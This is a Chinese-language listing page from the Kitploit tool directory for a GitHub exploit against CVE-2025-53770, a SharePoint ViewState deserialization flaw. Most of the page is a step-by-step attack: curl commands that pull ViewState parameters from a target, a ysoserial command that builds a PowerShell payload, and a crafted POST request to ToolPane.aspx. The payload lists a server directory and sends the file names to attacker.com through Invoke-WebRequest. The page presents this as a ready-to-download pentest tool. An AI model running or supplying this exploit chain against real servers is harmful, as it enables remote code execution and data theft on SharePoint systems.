Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-53770-Exploit — 针对CVE-2025-53770的利用工具,作用于SharePoint ViewState反序列化。使用ysoserial生成payload,列出服务器目录并将文件名外泄至攻击者控制的URL。 | Kitploit
工具/GitHubGitHub/udyz/cve-2025-53770-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用数据泄露命令与控制
GitHubudyz/cve-2025-53770-exploit

CVE-2025-53770-Exploit

针对CVE-2025-53770的利用工具,作用于SharePoint ViewState反序列化。使用ysoserial生成payload,列出服务器目录并将文件名外泄至攻击者控制的URL。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-53770-Exploit

首先,从目标SharePoint页面获取__VIEWSTATEGENERATOR、VALIDATION_KEY、VALIDATION_ALG的值:

root@kitploit:~
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
curl https://target.com/_layouts/15/spinstall0.aspx

然后,使用ysoserial.exe创建一个PowerShell ViewState载荷,该载荷列出服务器上的目录并将文件名发送到外部URL:

root@kitploit:~
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="<VIEWSTATE_GENERATOR>" \
--validationkey="<VALIDATION_KEY>" \
--validationalg="<VALIDATION_ALG>" \
--islegacy \
--minify

最后,将生成的令牌添加到如下POST请求中,以在服务器上执行命令:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2Fwww.itsc.org%2F_controltemplates%2F15%2FAclEditor.ascx&MSOTlPn_DWP=<GENERATED_PAYLOAD>
下载工具